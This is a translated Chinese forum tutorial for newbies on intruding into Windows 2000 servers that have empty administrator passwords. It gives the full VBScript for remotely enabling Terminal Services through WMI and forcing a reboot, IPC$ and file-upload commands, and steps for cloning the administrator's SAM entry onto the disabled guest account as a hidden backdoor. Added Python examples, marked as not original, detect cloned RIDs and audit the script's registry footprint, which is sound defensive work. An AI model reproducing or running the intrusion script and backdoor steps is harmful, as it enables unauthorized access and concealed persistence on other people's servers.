A Simple 3389 Intrusion Walkthrough
Original: caozhe (草哲)
Source: 中国欲网 Technical Forum -- 草哲

I've seen a great many articles online teaching how to break into this or that, and I think a newbie simply can't understand them!
So I had an idea: write something simpler, suited to newbies, and share what I've learned with everyone!
To do this, I recommend you work from a Win2000 machine!

First, you need tools! Let me recommend a few programs, which are also the ones I use all the time:
for scanning, X-Scan V2.3, WINNTAutoAttack and 流光 (Fluxay)!
I rarely use X-Scan these days; mostly I use WINNTAutoAttack, and of course I often use 小榕's 流光 too!
Opening Terminal Services remotely takes just one script; the code is in the second post (reproduced below, after the separator)! Save it as *.vbe (I saved mine as rots.vbe).
Cloning the account needs nothing more than psu!

OK, say the scan turned up a server with a weak NT password: the IP is 120.0.0.1, the administrator account is administrator and the password is empty.
Run CMD (the DOS prompt under 2000) and we open Terminal Services on it!
The command is:
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
The command above should be easy to follow, right? cscript rots.vbe is the command; after it come the IP, then the administrator account, then the password. Because the administrator password on 120.0.0.1 is empty, we write a pair of double quotes to stand for "empty". Next comes the port; you can set the terminal port to whatever you like. /fr is the reboot switch (forced reboot; I generally use this one. You can also use /r, which is a normal reboot).
Because Terminal Server exists only in Win2000 Server and above (Server included), PRO of course won't work. This version of the script checks the server's edition, and if it is PRO it prompts you to abort the installation!

If all goes well, you'll be able to connect to the terminal after a little while. We can ping it to see whether it has rebooted: ping 120.0.0.1 -t
After installation, connect to the terminal with a connection client! Now we clone an account, heh, to make things convenient later on!

Back to DOS! We establish an IPC$ connection:
net use \\120.0.0.1\ipc$ "" /user:"administrator"
I think this command should be easy to follow! Once it completes, we upload psu to the target's winnt\system32 directory:
copy psu.exe \\120.0.0.1\admin$\system32
Once it's uploaded, we start making the backdoor account on the compromised box (肉鸡)! Over to the box!

Suppose the guest account is disabled; guest is exactly what we'll turn into the backdoor account!
On that server run CMD and type at the command line:
psu -p regedit -i PID

A word of explanation: the PID at the end is the process ID of the system process winlogon. Right-click the taskbar and open Task Manager!
On the Processes tab, find the winlogon process; the number next to it is winlogon's PID, say 5458.
So the command becomes:
psu -p regedit -i 5458
This opens the registry editor directly, able to read the local SAM.
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
Beneath it is the local user information! What we're going to do is clone the disabled guest into an account with administrator privileges!
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
Check the type of administrator: it's 1f4. Then guest: 1f5.
Good. Knowing the types, open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
Under this key, double-click F on the right, copy the jumble of characters inside, then open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
double-click F on the right, and paste what you just copied into it!
When that's done, export these two keys: HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
and HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
After exporting, delete both keys, then import them back in! Close the registry editor.

Open CMD and type at the command line:
net user guest password
This command sets guest's password; the trailing password is the password.
Then type
net user guest /active:y
This command activates the guest account; then we disable it again:
net user guest /active:n
The three commands above must be run at the DOS prompt!

OK! Open Computer Management and look at Users: see, the guest account is still disabled! Haha, but it already has administrator privileges!
And it doesn't show in the Administrators group, yet it can log on to the terminal, just like the administrator account!
Log off and log on as guest!
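As an added example (not from the original post), here is how a defender spots the cloned guest this section produces: a per-user F value carrying a RID other than the one its subkey is named for, or one RID carried by two subkeys. The 0x30/0x38 field offsets are those used by common SAM parsers and are an assumption here; the F blobs are constructed, not real SAM data.

```python
import struct

# Added example (not from the original post): detect the "cloned guest" described above by
# reading the RID each SAM user's F value carries. Offsets are those used by common SAM
# parsers (RID: DWORD at 0x30, account-control flags: WORD at 0x38); blobs are constructed.
RID_OFFSET, ACB_OFFSET = 0x30, 0x38
ACB_DISABLED = 0x0001

def make_f(rid, acb):
    """Constructed minimal F blob: zeros except the RID and ACB fields."""
    f = bytearray(0x50)
    struct.pack_into("<I", f, RID_OFFSET, rid)
    struct.pack_into("<H", f, ACB_OFFSET, acb)
    return bytes(f)

def parse_f(blob):
    """Return (rid, acb_flags) from an F value."""
    rid, = struct.unpack_from("<I", blob, RID_OFFSET)
    acb, = struct.unpack_from("<H", blob, ACB_OFFSET)
    return rid, acb

def find_cloned_accounts(users):
    """users maps each Users\\<hex RID> subkey name to its F blob.
    Reports a subkey whose F carries another RID (with its own 'disabled' flag, which is
    what Computer Management shows), and any RID carried by more than one subkey."""
    findings, by_rid = [], {}
    for key, blob in users.items():
        rid, acb = parse_f(blob)
        by_rid.setdefault(rid, []).append(key)
        if rid != int(key, 16):
            findings.append(("rid_mismatch", key, rid, bool(acb & ACB_DISABLED)))
    for rid, keys in by_rid.items():
        if len(keys) > 1:
            findings.append(("rid_shared", rid, tuple(sorted(keys))))
    return findings

# Constructed samples: a healthy box, then the same box after the walkthrough copies
# Users\000001F4\F (administrator) over Users\000001F5\F (guest) and re-disables guest.
CLEAN = {
    "000001F4": make_f(0x1F4, 0x0010),                 # normal account
    "000001F5": make_f(0x1F5, 0x0010 | ACB_DISABLED),  # disabled guest
}
CLONED = {**CLEAN, "000001F5": make_f(0x1F4, 0x0010 | ACB_DISABLED)}

if __name__ == "__main__":
    for finding in find_cloned_accounts(CLONED):
        print(*finding)
```

The account still reports as disabled, which is why the walkthrough's final state looks harmless in Computer Management; the RID mismatch is the signal to act on.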

I'm worn out from all this typing! Not easy at all! Heh, I hope everyone can follow the above!
If anything is still unclear, you can ask me; whatever I know I'll gladly tell you!

Since I'm a newbie myself, having learned a little I didn't know what to do with myself, heh! If anything here is wrong, I hope the experts will correct me!

----------------------------------------------------------------------
Below is the script that opens Terminal Services; save it as *.vbe
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
' If started under wscript.exe, relaunch under cscript so console I/O works
if (lcase(right(wscript.fullname,11))="wscript.exe") then
    set objShell=wscript.createObject("wscript.shell")
    objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
    wscript.quit
end if
if wscript.arguments.count<3 then
    usage()
    wscript.echo "Not enough parameters."
    wscript.quit
end if

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
    port=wscript.arguments(3)
else
    port=3389
end if
if not isnumeric(port) then
    wscript.echo "The number of port is error."
    wscript.quit
end if
' Arguments arrive as strings, and in VBScript a string always compares greater than a
' number, so convert before the range check and before writing the DWORD below
port=clng(port)
if port<1 or port>65000 then
    wscript.echo "The number of port is error."
    wscript.quit
end if
if wscript.arguments.count>4 then
    reboot=wscript.arguments(4)
else
    reboot=""
end if

usage()
' Connect to the target's WMI service with the supplied credentials
outstreem.write "Conneting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
' Shutdown privileges needed by win32shutdown further down
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true

' Terminal Services exists only on Server editions; offer to stop otherwise
outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
    if instr(objinstoscaption.caption,"Server")>0 then
        wscript.echo "OK!"
    else
        wscript.echo "OS type is "&objinstoscaption.caption
        outstreem.write "Do you want to cancel setup?[y/n]"
        strcancel=instreem.readline
        if lcase(strcancel)<>"n" then wscript.quit
    end if
next

' Enable Terminal Services through the remote StdRegProv registry provider
outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
    .createkey HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
    .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
    .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
    .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
    .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)

' Win32Shutdown flags: 2 = reboot, 6 = forced reboot
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
    outstreem.write "Now, reboot target...."
    strwqlquery="select * from win32_operatingsystem where primary='true'"
    set colinstances=objswbemservices.execquery(strwqlquery)
    for each objinstance in colinstances
        objinstance.win32shutdown(flag)
    next
    showerror(err.number)
else
    wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

' Print the pending error (if any) and exit, otherwise report success
function showerror(errornumber)
    if errornumber Then
        wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
        if err.description <> "" then
            wscript.echo "Error description: "&err.description&"."
        end if
        wscript.quit
    else
        wscript.echo "OK!"
    end if
end function

function usage()
    wscript.echo string(79,"*")
    wscript.echo "ROTS v1.05"
    wscript.echo "Remote Open Terminal services Script, by 草哲"
    wscript.echo "Welcome to visite www.5458.net"
    wscript.echo "Usage:"
    wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
    wscript.echo "port: default number is 3389."
    wscript.echo "/r: auto reboot target."
    wscript.echo "/fr: auto force reboot target."
    wscript.echo string(79,"*")&vbcrlf
end function
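An added example, not part of the original post or of ROTS: a Python audit that parses a regedit export and checks it for the six registry values the script above writes plus the RDP listening port. The key paths are exactly those in the script; the .reg text is constructed, not taken from a real host.

```python
import re
# Added example, not from the original post: parse a regedit export and check it for the
# registry values rots.vbe writes. SAMPLE_REG below is constructed, not from a real host.
SECTION = re.compile(r"^\[(.+)\]$")
VALUE = re.compile(r'^"([^"]+)"=(?:dword:([0-9A-Fa-f]{8})|"(.*)")$')

def parse_reg(text):
    """Return {(key, name): int | str}; only DWORD and string values matter here."""
    values, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if (m := SECTION.match(line)):
            key = m.group(1)
        elif key is not None and (m := VALUE.match(line)):
            name, dword, string = m.groups()
            values[(key, name)] = int(dword, 16) if dword is not None else string
    return values

TS = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
ROTS_WRITES = {  # the values the script sets, keyed as regedit exports them
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache", "Enabled"): 0,
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer", "EnableAdminTSRemote"): 1,
    (TS, "TSEnabled"): 1,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD", "Start"): 2,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService", "Start"): 2,
    (r"HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle", "Hotkey"): "1",
}
PORT_KEY = (TS + r"\WinStations\RDP-Tcp", "PortNumber")

def audit(values):
    """(script writes present out of 6, RDP port); 6 plus a non-default port is the full footprint."""
    hits = sum(1 for k, v in ROTS_WRITES.items() if values.get(k) == v)
    return hits, values.get(PORT_KEY, 3389)

SAMPLE_REG = r"""REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00001f90
"""
```

A legitimately enabled Terminal Server also sets TSEnabled and the service start types, so the netcache, Installer policy and Hotkey writes together with a moved port are what distinguish this script's footprint from an administrator's install.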
Reposted from 安全焦点 (XFocus)